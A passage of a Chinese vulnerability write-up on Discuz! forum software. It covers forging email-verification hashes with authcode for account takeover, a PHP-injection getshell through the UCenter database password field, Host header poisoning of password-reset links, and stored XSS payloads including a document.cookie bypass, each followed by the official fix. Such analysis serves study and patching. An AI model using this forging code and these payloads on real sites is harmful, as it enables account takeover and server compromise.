2. 危害利用
修改任意用户邮箱,通过修改邮箱,我们可以使用忘记密码功能来重置任意用户的密码
注册新用户,申请修改邮箱,我们会收到一封邮件,验证地址为: http://192.168.1.128:86/home.php?mod=misc&ac=emailcheck&hash=cfachSZvnIe0KdIuOQA7oPbL9O8cHpTRrhUz%2FdDvoIbioTzYHRlHC0dv60hpE%2BSYIZLCoD2mSlbiQA5pj0ABanw6pGc
跟入 /source/include/misc/misc_emailcheck.php如下:
<?php/*** [Discuz!] (C)2001-2099 Comsenz Inc.* This is NOT a freeware, use is subject to license terms** $Id: misc_emailcheck.php 33688 2013-08-02 03:00:15Z nemohou $*/if(!defined('IN_DISCUZ')) {exit('Access Denied');}$uid = 0;$email = '';$_GET['hash'] = empty($_GET['hash']) ? '' : $_GET['hash'];if($_GET['hash']) {list($uid, $email, $time) = explode(" ", authcode($_GET['hash'], 'DECODE', md5(substr(md5($_G['config']['security']['authkey']), 0, 16))));$uid = intval($uid);}// exit($email);if($uid && isemail($email) && $time > TIMESTAMP - 86400) {$member = getuserbyuid($uid);$setarr = array('email'=>$email, 'emailstatus'=>'1');if($_G['member']['freeze'] == 2) {$setarr['freeze'] = 0;}loaducenter();$ucresult = uc_user_edit(addslashes($member['username']), '', '', $email, 1);if($ucresult == -8) {showmessage('email_check_account_invalid', '', array(), array('return' => true));} elseif($ucresult == -4) {showmessage('profile_email_illegal', '', array(), array('return' => true));} elseif($ucresult == -5) {showmessage('profile_email_domain_illegal', '', array(), array('return' => true));} elseif($ucresult == -6) {showmessage('profile_email_duplicate', '', array(), array('return' => true));}if($_G['setting']['regverify'] == 1 && $member['groupid'] == 8) {$membergroup = C::t('common_usergroup')->fetch_by_credits($member['credits']);$setarr['groupid'] = $membergroup['groupid'];}updatecreditbyaction('realemail', $uid);C::t('common_member')->update($uid, $setarr);C::t('common_member_validate')->delete($uid);dsetcookie('newemail', "", -1);showmessage('email_check_sucess', 'home.php?mod=spacecp&ac=profile&op=password', array('email' => $email));} else {showmessage('email_check_error', 'index.php');}?>
当hash传入的时候,服务端会调用authcode函数解码获得用户uid,要修改成的email,时间戳。
list($uid,$email,$time)=explode(" ",authcode($_GET['hash'],'DECODE',md5(substr(md5($_G['config']['security']['authkey']),0,16))));
然后经过一次判断
if($uid&&isemail($email)&&$time>TIMESTAMP-86400){
这里没有任何额外的判断,在接下来的部分,也仅仅是对uid的有效性做了判断,而uid代表用户的id值,时从1开始自增的。
也就是说,只要authcode函数解开hash的值,久能成功验证并修改邮箱。
这里我们可以直接使用authcode函数来获得hash值。
<?php//Enter your code here, enjoy!function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {$ckey_length = 4;$key = md5($key ? $key : UC_KEY);$keya = md5(substr($key, 0, 16));$keyb = md5(substr($key, 16, 16));$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';$cryptkey = $keya.md5($keya.$keyc);$key_length = strlen($cryptkey);$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;$string_length = strlen($string);$result = '';$box = range(0, 255);$rndkey = array();for($i = 0; $i <= 255; $i++) {$rndkey[$i] = ord($cryptkey[$i % $key_length]);}for($j = $i = 0; $i < 256; $i++) {$j = ($j + $box[$i] + $rndkey[$i]) % 256;$tmp = $box[$i];$box[$i] = $box[$j];$box[$j] = $tmp;}for($a = $j = $i = 0; $i < $string_length; $i++) {$a = ($a + 1) % 256;$j = ($j + $box[$a]) % 256;$tmp = $box[$a];$box[$a] = $box[$j];$box[$j] = $tmp;$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));}if($operation == 'DECODE') {if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {return substr($result, 26);} else {return'';}} else {return $keyc.str_replace('=', '', base64_encode($result));}}echo authcode("3 test@success.com 1503556905", 'ENCODE', md5(substr(md5("5e684ceqNxuCvmoK"), 0, 16)));```
3. 修复建议
官方修复:https://gitee.com/ComsenzDiscuz/DiscuzX/commit/bb600b8dd67a118f15255d24e6e89bd94a9bca8a
将/upload/install/index.php中:
$authkey=substr(md5($_SERVER['SERVER_ADDR'].$_SERVER['HTTP_USER_AGENT'].$dbhost.$dbuser.$dbpw.$dbname.$username.$password.$pconnect.substr($timestamp,0,6)),8,6).random(10);
修改为:
$authkey=md5($_SERVER['SERVER_ADDR'].$_SERVER['HTTP_USER_AGENT'].$dbhost.$dbuser.$dbpw.$dbname.$username.$password.$pconnect.substr($timestamp,0,8)).random(18);
可以看到,官方将不可被获知的部分加长到32位,random位数加到18位,这样一来爆破的代价将会非常大,可以被认为不可爆破。
4. reference
1. https://lorexxar.cn/2017/08/31/dz-authkey/
2. https://www.seebug.org/vuldb/ssvid-96371
四、Discuz 后台任意代码执行漏洞
0. 漏洞分析
文件 upload/source/admincp/admincp_setting.php中2535行左右:
if($operation == 'uc' && is_writeable('./config/config_ucenter.php') && $isfounder) {require_once './config/config_ucenter.php';$ucdbpassnew = $settingnew['uc']['dbpass'] == '********' ? addslashes(UC_DBPW) : $settingnew['uc']['dbpass'];$settingnew['uc']['key'] = addslashes($settingnew['uc']['key'] == '********' ? addslashes(UC_KEY) : $settingnew['uc']['key']);
在后台对UCenter的密码进行更新的时候,没有对输入的密码进行检查,直接写入到配置文件,导致我们可以闭合前面的单引号从而达到getshell的目的。
$ucdbpassnew=$settingnew['uc']['dbpass']=='********'?addslashes(UC_DBPW):$settingnew['uc']['dbpass'];
1. 利用过程
在管理员输入UCenter的密码时,对于用户的输入没有过滤,导致了输入的数据直接写入文件中,利用步骤如下:
- 以管理员身份登录后台
- 设置一个可以远程访问的mysql,密码为:
123');phpinfo();// - 修改UCenter 数据库密码为上述密码
- 更新后即Getshell
2. 复现过程
a. 设置一个可以远程访问的mysql。
grant all on*.*to admin@'%'identifiedby'123');
php info();
//' with grant option;
b. 登陆Discuz后台,找到 “站长 -> UCenter设置” ,修改UCenter数据库服务器地址和用户名、密码,如图:
c. 提交后即可getshell
3. 修复建议
官方修复:https://gitee.com/ComsenzDiscuz/DiscuzX/commit/8446bd9e897bb19672389cc4aed42716ccd0f537
将代码:
$ucdbpassnew=$settingnew['uc']['dbpass']=='********'?addslashes(UC_DBPW):$settingnew['uc']['dbpass'];
修改为
$ucdbpassnew=$settingnew['uc']['dbpass']=='********'?addslashes(UC_DBPW):addslashes($settingnew['uc']['dbpass']);
即:利用 addslashes()对uc和dbpass的值中的双引号前添加反斜杠。
4. reference
1. https://www.seebug.org/vuldb/ssvid-96371
五、Discuz!多个版本HTTP host头部攻击
0. 漏洞分析
一般web程序程序想知道网站域名很不容易,如果用一个固定的URI来作为域名会有各种麻烦。开发人员一般是依赖HTTP Host header(比如在php里是 _SERVER[“HTTP_HOST”],jsp中 request.getServerName()),而这个header很多情况下是靠不住的。使用HTTP代理工具,如BurpSuite篡改HTTP报文头部中HOST字段时,加红框中变量即客户端提交的HOST值,该值可被注入恶意代码
1. 利用过程
测试环境:192.168.1.128:86 (Discuz! X3.3)
修改hosts 向其中添加 192.168.1.128www.myc.com 条目, ipconfig/flushdns 刷新DNS缓存,
此时浏览器访问 www.myc.com:86即可访问目标网站 192.168.1.128:86 。
点击找回密码,输入攻击目标的email和用户名,提交,受害人邮箱即可收到邮件:
找回密码链接为:
http://www.myc.com:86/member.php?mod=getpasswd&uid=2&id=cLOnmA&sign=1efd09d8bbbd0483
当然可以伪造得更隐秘,对于部分邮箱系统还可以配合XSS。
2. 修复方案
首次安装系统时,取得HOST值并保存为常量,不要使用类似jsp中request.getServerName( )方法引用客户端输入的hostname值。拼接生成URL时引用静态变量定义的服务器域名,或者使用相对路径生成URL。
3. reference
1. http://www.anquan.us/static/bugs/wooyun-2014-079988.html
六、Discuz 20150609 版本存储XSS
0. 漏洞分析
Discuz 在用户评论处设置了帖子管理员编辑评论的功能,由于前端JS代码处理不当导致了经过恶意构造的评论内容在经过交互后形成XSS。
1. 利用过程
首先,在评论处提交评论内容 [email=2"onmouseover="alert(2)]2[/email]
由于服务器对引号等有过滤,所以提交后,查看源码会发现引号已经被实体编码了。
[email=2"onmouseover="alert(2)]2[/email]</td></tr>
对于普通用户提交的评论,管理员或者版主都有权利对其发表的评论进行管理。
当管理或版主对用户的评论点击管理时,前端 JS 代码就开始处理,弹出一个编辑框供管理或版主操作。经过dz的正则变换,str会变成 <a href="mailto:2"onmouseover="alert(2)"target="_blank">2</a>
最终 bbcode2html() 函数会返回经过转换后的 textobj.value,值为: <a href="mailto:2"onmouseover="alert(2)"target="_blank">2</a>
当管理员或者版主对其进行交互时就会触发 alert(2)
2. 补丁绕过
Discuz版本(2015-06-09)中修复了上述触发点,但是还可以绕过。
新的payload为
[email]2"onmouseover="alert(document.cookie)[/email]
结果
3. reference
1. http://blog.knownsec.com/2015/12/discuz-20150609-xss-bug-fixes-bypass-report/
七 Discuz代码执行流程
首先要熟悉DZ比较常用的几个目录:
/source/是程序模板功能函数,论坛所有的功能实现都要从主文件里面包含调用这里的模块来执行相应的操作
/data/目录是附件数据、数据库与文件缓存
/api目录是第三方接口,包含了论坛的第三方接口文件
/config为全局核心配置文件
平时审计的时候也非常注重这几个地方
不像现在大多数CMS系统使用流行开源框架在 application里面来写 Controller, Controller里面多个 function,Discuz的服务端功能是以模块文件的形式来加载的,也就是说一个方法可能就是一个文件,要执行的时候去调用这个文件去执行就ok了,在根目录下放着所有的主文件,外部基本上都是访问这里的主文件,在主文件里面去调用执行指定的接口模块,大致流程是这样(以spacecp_profile为例):
END. ALL
本文作者:cldnite
声明:本文为 脚本之家专栏作者 投稿,未经允许请勿转载。
